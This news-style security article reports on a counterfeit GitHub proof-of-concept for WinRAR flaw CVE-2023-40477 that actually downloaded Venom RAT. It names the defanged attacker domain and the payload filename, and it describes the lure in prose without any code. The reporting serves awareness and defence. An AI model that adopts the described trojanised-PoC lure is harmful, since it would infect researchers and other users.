A recent incident highlights a significant cybersecurity threat involving a counterfeit proof-of-concept (PoC) exploit for a newly identified vulnerability in WinRAR. This exploit was shared on GitHub with the malicious intent of infecting users who downloaded the code with Venom RAT malware. Researchers from Palo Alto Networks’ Unit 42, including Robert Falcone, noted that this fake PoC was derived from an existing exploit script targeting a SQL injection vulnerability in GeoServer, identified as CVE-2023-25157.
As the cybersecurity landscape evolves, the proliferation of fraudulent PoCs has become increasingly common, effectively posing risks to the research community and potentially targeting other malicious actors who may integrate recent vulnerabilities into their toolkit. This incident underscores the opportunistic nature of attackers in exploiting new vulnerabilities, with the recent WinRAR flaw, designated as CVE-2023-40477, serving as an attractive target.
The hosting account for the malicious repository, attributed to a user named whalersplonk, was rendered inaccessible shortly after the PoC was committed on August 21, 2023, merely four days following the public revelation of the vulnerability. The issue within WinRAR revolves around improper validation, facilitating the possibility of remote code execution (RCE) on Windows systems. The vulnerability was addressed last month in WinRAR version 6.23, alongside another flaw tracked as CVE-2023-38831, which was already subject to active exploitation.
Upon examining the malicious repository, cybersecurity analysts discovered both a Python script and a Streamable video tutorial on leveraging the exploit. Notably, the script did not execute the PoC but instead connected to a remote server to download an executable named Windows.Gaming.Preview.exe, a variant of Venom RAT. This executable facilitates various commands, including listing running processes and receiving instructions from a command and control server.
Further investigation into the attacker’s infrastructure indicated that the domain checkblacklistwords[.]eu was registered at least ten days before the vulnerability was publicly disclosed. This suggests a premeditated effort to exploit the urgency surrounding the bug, potentially attracting unsuspecting victims.
Falcone emphasized the grave implications of this deceptive PoC, noting its intent to compromise individuals soon after the vulnerability’s announcement. He pointed out that the scam exploited a well-known RCE vulnerability, highlighting how attackers may target a wide range of victims, including other malicious entities.
From a cybersecurity perspective, the tactics employed in this incident align with several phases detailed in the MITRE ATT&CK framework. Initially, the attacker likely utilized techniques associated with initial access, capitalizing on the high interest surrounding the vulnerability to lure unsuspecting users. Persistence mechanisms could have been implemented through the deployment of the Venom RAT, which enables ongoing communication and command execution. The attack’s potential methodologies underscore the critical need for vigilance and preparedness among businesses to avoid similar threats in the future.
